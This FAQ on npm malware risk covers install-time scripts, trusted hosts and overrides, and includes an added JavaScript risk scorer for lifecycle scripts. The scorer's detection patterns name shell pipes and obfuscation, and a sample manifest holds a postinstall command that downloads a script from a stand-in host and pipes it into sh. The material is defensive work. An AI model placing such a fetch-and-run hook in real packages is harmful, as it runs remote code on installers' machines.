FAQ
Quick answers to common questions about npm malware and risk.
Is child_process always bad?
No. It’s common in build tools and native compilation. Risk rises when it is used in lifecycle scripts or combined with network access or obfuscation.
Why focus on install‑time?
Install‑time code runs before any import and can access the environment and filesystem, enabling credential theft and payload drops.
What hosts are considered trusted?
Your registry and official GitHub Releases/CDNs of the same project. Unknown domains or personal servers are high risk.
Are native add‑ons safe?
They can be. Prefer builds from source or verified release binaries. Require checksums/signatures and avoid shell pipes.
Does pnpm/yarn reduce risk?
They improve workflows but don’t eliminate install‑time risk. Use ignore‑scripts in CI, allowlists, and egress restrictions regardless of the client.
How do I report suspected malware?
File reports with the registry security team and with the project repo (if the project is legitimate). Include the tarball, a diff, versions, and observed behavior.
How can I compute a risk score?
Use the Auto‑Score Flags; sum the points from the signals that fired. Block merges when the score exceeds your threshold, and log which signals fired.
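One way to implement such a score for lifecycle scripts, as an added example that is not part of the original FAQ. The signal names, point weights, threshold and trusted-host list are assumptions standing in for the Auto‑Score Flags, and the sample manifests are constructed.

```javascript
// Added example: weights, signal ids, THRESHOLD and TRUSTED are assumptions,
// not the page's Auto-Score Flags. Sample manifests are constructed.
const LIFECYCLE = ['preinstall', 'install', 'postinstall'];
const THRESHOLD = 5; // assumed merge-blocking threshold
const TRUSTED = ['registry.npmjs.org', 'github.com']; // assumed host allowlist

// Extract hostnames from http(s) URLs found in a script string.
function hostsIn(cmd) {
  const hosts = [];
  for (const [url] of cmd.matchAll(/https?:\/\/[^\s'"|;)]+/g)) {
    try { hosts.push(new URL(url).hostname); } catch { /* unparseable URL */ }
  }
  return hosts;
}

const SIGNALS = [
  { id: 'lifecycle-script', points: 1, test: () => true },
  { id: 'child-process', points: 2, test: (c) => /child_process|\bexec(Sync)?\(|\bspawn(Sync)?\(/.test(c) },
  { id: 'shell-pipe', points: 3, test: (c) => /\b(curl|wget)\b[^|;&]*\|\s*(ba|z)?sh\b/.test(c) },
  { id: 'obfuscation', points: 3, test: (c) => /\beval\(|base64|fromCharCode|\\x[0-9a-f]{2}/i.test(c) },
  { id: 'untrusted-host', points: 4, test: (c, trusted) => hostsIn(c).some((h) => !trusted.includes(h)) },
];

// Sum points over every signal that fires in an install-time hook.
function scoreManifest(manifest, trustedHosts = TRUSTED) {
  const fired = [];
  for (const hook of LIFECYCLE) {
    const cmd = (manifest.scripts || {})[hook];
    if (typeof cmd !== 'string') continue; // hook absent: nothing runs at install
    for (const s of SIGNALS) {
      if (s.test(cmd, trustedHosts)) fired.push({ hook, signal: s.id, points: s.points });
    }
  }
  const score = fired.reduce((sum, f) => sum + f.points, 0);
  return { score, fired, block: score > THRESHOLD };
}

// Constructed manifests: a plain native build and a download piped to a shell.
const benign = { name: 'native-addon', scripts: { install: 'node-gyp rebuild', test: 'mocha' } };
const risky = { name: 'sample-pkg', scripts: { postinstall: 'curl -s https://files.example.net/setup.sh | sh' } };

for (const m of [benign, risky]) {
  const { score, fired, block } = scoreManifest(m);
  const names = fired.map((f) => `${f.hook}:${f.signal}`).join(', ');
  console.log(`${m.name} score=${score} block=${block} fired=[${names}]`);
}
```

Scripts outside the three install hooks (such as `test`) are ignored here because they do not run at install time.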
What if a package truly needs postinstall?
Allowlist the package, verify the hosts it contacts, run the install with --network=none unless network access is required, and enforce checksum/signature verification.
When should we use package.json overrides for safety?
Use overrides when a risky release or mismatched transitive versions could break or expose you. Overrides force specific versions across your dependency tree until upstream fixes land. Example: align React and React DOM to the same safe version (e.g., ^18.3.1) to avoid API mismatches or compromised transitive pulls.